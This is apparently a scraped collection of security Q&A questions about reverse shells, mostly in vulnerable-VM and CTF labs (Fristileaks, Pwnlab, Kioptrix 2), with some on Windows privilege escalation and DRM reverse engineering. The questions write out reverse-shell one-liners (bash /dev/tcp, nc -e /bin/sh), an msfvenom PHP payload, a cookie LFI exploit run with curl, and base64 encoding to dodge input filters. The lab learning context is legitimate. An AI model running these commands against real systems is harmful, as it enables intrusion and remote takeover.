Will a Web Server detect a base64 encoded reverse shell on run time?

A vulnerable website blocks almost everything that is related to PE (Privilege Escalation), but when encoding the ls -al code into a base64 format, the website doesn’t block the dangerous code (at Scan Time), will the web server detect and block the code at Run Time ?

base64 -d <<< bHMgLWFs | sh: Base64 of ls -al

Web Server: Scanning the input.. Seems fine, I will not block it.

Web Server Inside: ls -al # Will it block it at run time ?

Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it’s HTTP)
  • The connection fails; I don’t even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I’m doing wrong?

Can’t one reverse engineering Chrome source code to reveal Widevine and friends keys?

If I understand correctly, Widevine, FairPlay and PlayReady are all security through obscurity. Given the popularity of services using them, can’t someone just RE them and find exactly how their work? If so, was it done? If not, why? If this (can be) done, why people continue using these services?

Related: How does Widevine, FairPlay, and other DRM's work under the hood?

Help Understanding PHP Reverse Shells

I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.

For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used msfvenom for the script:

msfvenom -p php/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx -f raw > shell.php  

I had to rename the script from shell.php to shell.php.png because the site only let me upload pictures. Once I uploaded the script, I found the url for the picture/script, set up a netcat listener on my attacking machine, and then visited the page with the script and that was enough to establish a connection between the target and attacker.

It was much more difficult to establish a connection on the Pwnlab Init VM.

Again, I gained login access to the website’s upload page. I tried uploading the same reverse shell script but I was not able to get access after setting up a netcat listener.

What I had to do, ultimately, was upload a php backdoor script:

(/usr/share/webshells/php/simple-backdoor.php) 

Then, I had to exploit the below vulnerability on the index.php page, which allows for injection into the lang cookie

if (isset($  _COOKIE['lang'])) {         include("lang/".$  _COOKIE['lang']); } 

I then used the below curl query to pass the page with the uploaded php backdoor to the lang variable, and then netcat to my attacking machine, which I had already set to listen for a connection

curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx 

Can anybody shed any light on why it was so easy to establish a reverse shell in one instance and more involved in another? What is going on behind the scenes in the Pwnlab VM such that visiting the URL with the uploaded reverse shell script does not work, but exploiting the lang variable with a PHP backdoor is sufficient?

I suppose you just need to have a lot of tools at your disposal and keep trying until something works, but it would help to have a concept of why one approach works and another doesn’t.

I am a member of the Administrators group on a Windows 7 box, how can I spawn a reverse shell with elevated privileges?

I am learning Windows Privilege escalation. I’ve managed to add a user to the Administrators group but I don’t know how to execute nc.exe, present in the Temp dir, with eleavated privileges. My end goal, here, is to get a reverse-shell as nt authority\system, with this newly created privileges for the user user.

Following are some of the details on the Windows box:

c:\Temp>net localgroup administrators net localgroup administrators Alias name     administrators Comment        Administrators have complete and unrestricted access to the computer/domain  Members  ------------------------------------------------------------------------------- Administrator TCM user The command completed successfully.   c:\Temp>whoami whoami tcm-pc\user  systeminfo  Host Name:                 TCM-PC OS Name:                   Microsoft Windows 7 Professional  OS Version:                6.1.7601 Service Pack 1 Build 7601 OS Manufacturer:           Microsoft Corporation OS Configuration:          Standalone Workstation OS Build Type:             Multiprocessor Free Registered Owner:          TCM Registered Organization:    Product ID:                00371-221-2693053-06399 Original Install Date:     4/15/2020, 9:38:13 AM System Boot Time:          6/17/2020, 9:13:27 PM System Manufacturer:       Xen System Model:              HVM domU System Type:               x64-based PC Processor(s):              1 Processor(s) Installed.                            [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz BIOS Version:              Xen 4.2.amazon, 8/24/2006 Windows Directory:         C:\Windows System Directory:          C:\Windows\system32 Boot Device:               \Device\HarddiskVolume1 System Locale:             en-us;English (United States) Input Locale:              en-us;English (United States) Time Zone:                 (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory:     2,048 MB Available Physical Memory: 1,413 MB Virtual Memory: Max Size:  4,095 MB Virtual Memory: Available: 3,409 MB Virtual Memory: In Use:    686 MB Page File Location(s):     C:\pagefile.sys Domain:                    WORKGROUP Logon Server:              \TCM-PC                                                                             Hotfix(s):                 3 Hotfix(s) Installed.                                                                                          [01]: KB2534111                                                                                                 [02]: KB2999226                                                                                                 [03]: KB976902 Network Card(s):           1 NIC(s) Installed.                                                                                             [01]: AWS PV Network Device                                                                                           Connection Name: Local Area Connection 2                                                                        DHCP Enabled:    Yes                                                                                            DHCP Server:     10.10.0.1                                                                                      IP address(es)                                                                                                  [01]: 10.10.50.233                                                                                              [02]: fe80::f1df:5563:c002:f2c1                                                                                                                                                                c:\Temp>netsh firewall show config netsh firewall show config   Domain profile configuration:                                                                                   -------------------------------------------------------------------                                             Operational mode                  = Enable                                                                      Exception mode                    = Enable                                                                      Multicast/broadcast response mode = Enable Notification mode                 = Enable  Service configuration for Domain profile: Mode     Customized  Name ------------------------------------------------------------------- Enable   No          Remote Desktop  Allowed programs configuration for Domain profile: Mode     Traffic direction    Name / Program -------------------------------------------------------------------  Port configuration for Domain profile: Port   Protocol  Mode    Traffic direction     Name -------------------------------------------------------------------  ICMP configuration for Domain profile: Mode     Type  Description ------------------------------------------------------------------- Enable   2     Allow outbound packet too big  Standard profile configuration (current): ------------------------------------------------------------------- Operational mode                  = Disable Exception mode                    = Enable Multicast/broadcast response mode = Enable Notification mode                 = Enable  Service configuration for Standard profile: Mode     Customized  Name ------------------------------------------------------------------- Enable   No          File and Printer Sharing Enable   No          Network Discovery Enable   No          Remote Desktop  Allowed programs configuration for Standard profile: Mode     Traffic direction    Name / Program -------------------------------------------------------------------  Port configuration for Standard profile: Port   Protocol  Mode    Traffic direction     Name -------------------------------------------------------------------  ICMP configuration for Standard profile: Mode     Type  Description ------------------------------------------------------------------- Enable   2     Allow outbound packet too big 

Why to use Reverse Shell?

I know that reverse shell lets victim connects to us but i heard that people mostly use reverse shell ,why to use reverse shell while hacking the network outside our local network as we have to do port forwarding?it only brings some extra work

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

I’ve completed kioptrix level 2 challenge via bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is why netcat reverse shell executed in web browser via command injection bug doesn’t work when it was working just fine via terminal?

My Setup

Kali -  10.10.13.37 Kioptrix 2 - 10.10.13.254 

netcat listerner

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444 LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))  kali@kali:~$    

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444 id uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor) 

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0 00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0 00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0  00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3 00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0 00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97 00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0